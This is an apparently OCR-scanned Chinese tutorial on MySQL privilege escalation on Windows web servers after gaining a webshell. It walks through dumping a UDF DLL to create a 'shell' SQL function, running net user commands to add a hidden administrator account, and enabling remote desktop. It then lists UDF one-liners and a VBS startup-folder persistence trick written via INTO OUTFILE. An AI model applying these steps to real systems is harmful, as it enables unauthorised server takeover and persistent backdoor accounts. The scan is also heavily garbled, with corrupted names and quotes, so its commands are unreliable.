Mysql数据库是目前用得最多的流行数据库之一，其流行架构为php+mysql+apache,支 持linux和windows操作系统，在webshell渗透过程中，通过webshell有可能获得mysql的安装目录，通过下载mysql数据库中的user,myd表，能够方便的破解root用户的密码。Root 用户的密码还可能从网页脚本文件中获得，数据库连接直接使用^的用户。在获得!^的 密码后，通过到处udf.dll函数，在条件合适的情况下，可以获得服务器权限，以下面的一个实例来介绍如何通过mysql的root用户来提权。
设置mysql提权脚本文件

将mysql提权脚本文件上传服务器上/运行后，需要对正地址、UID、passwod、db 进行配置，如图1所示，IP地址设置为localhost、127. 0. 0.1以及真实IP地址， 七4默认为100〖，其它具^*001用+武限的用户名称也可以，口¥4为具有100丨权限用户的 密码，db默认选择mysql,单击提交查询内容进行连接测试。
 
设置Mysql提交脚本文件

进行连接测试
连接成功后，会给出相应的提示信息，如图2所示，给出用户，数据库，数据目录 (datadir),基本目录（basedir),版本，插件路径，mysql函数等信息。
连接测试
创建“shell”函数
单击“Dump UDF”将1)0匕0匕文件导出到默认的插件目录下，然后再运行“Create 卩而0^100”将创建“81^11”函数。如图3所示，如果前面已经创建过81^11函数，则会提 示系统中已经存在“shell”函数。
 
图3创建“shell”函数 查看用户

在查询窗口中输入“select shell (' cmd',' net user’）”查看系统所有的用户，如图4 所示，可以正常查看系统的所有用户信息。

分别在查询中输入脚本 “select shell (’ cmd’, ’ net user temp templ23456’) ”、“select shell(’cmd’，’net localgroup administrators temp /add ’）” 并执行该查询命令，如果 执行成功，则表示在系统中添加“丨挪口”用户，密码为“1咖口123456”，同时将该用户添加 到管理员组中，使其具备管理员权限，执行成功。
在sql查询中输入“select shell（‘cmd’，'net localgroup administrators')"命令查看刚才添加到用户是否真的添加成功。查询结果表明已经将temp用户添加到管理员组中。
目前对于一些网站来说，一般都会提供远程终端服务，只要用户添加成功，则可以直接 登录该服务器，如图8所示，输入用户名和密码，成功进入该服务器，至此通过呵叫1的 root用户成功提权。

小结
通过本案例中的方法可以快速的将财1^1^11权限提升到服务器权限，当然还有其它的一 些方法通过呵叫1提权，下面对经常用到的一些有关呵叫1的提权命令和方法进行总结。
（1）udf提权常用的一些命令
create function cmdshell returns string soname ' udf. dlT
select cmdshell(net user antian365 www.jybase.net /add’)；
select cmdshell(net localgroup administrators antian365 /add’)
select cmdshell(net localgroup administrators J);
select cmdshell(ipconfig /all*);
select cmdshell(net user*);
select cmdshell(regedit /s d:\wwwroot\3389.reg’）；
drop function cmdshell; select cmdshell(' netstat -an*)
(2)vbs启动项提权
先通过舶化1^11连接数据库，通过建立表&,将^^^入表里，然后导入启动项， 该脚本仅仅对中文版本的有效，如果是使用其他语言版本操作系统，仅仅需要对 “C:\\Documents and Settings\\All UsersW「开始」菜单\\程序\\启动\\&.卩匕8” 这个进 行相应更改即可。在％8脚本后面有个^^^^出0勝窗口，以安静模式运行。该方 法是在通过“[提权失败的情况下，‘§插入到启动中，待系统重启后将自动添加一个用 户。
—
create table a (cmd text);
insert into a values ("set wshshell=createobject (,",wscript.shell'"0 "); insert into a values ("a=wshshell.run (〃〃cmd.exe /c net user antian 123!@#$% /add",0) 〃 );
insert into a values (〃b=wshshell.run (〃〃cmd.exe /c net localgroup administrators antian /add〃'0) 〃 );
select * from a into outfile "C:\\Documents and Settings\\All UsersW「开始」 菜单\\程序\\启动\\& vbs";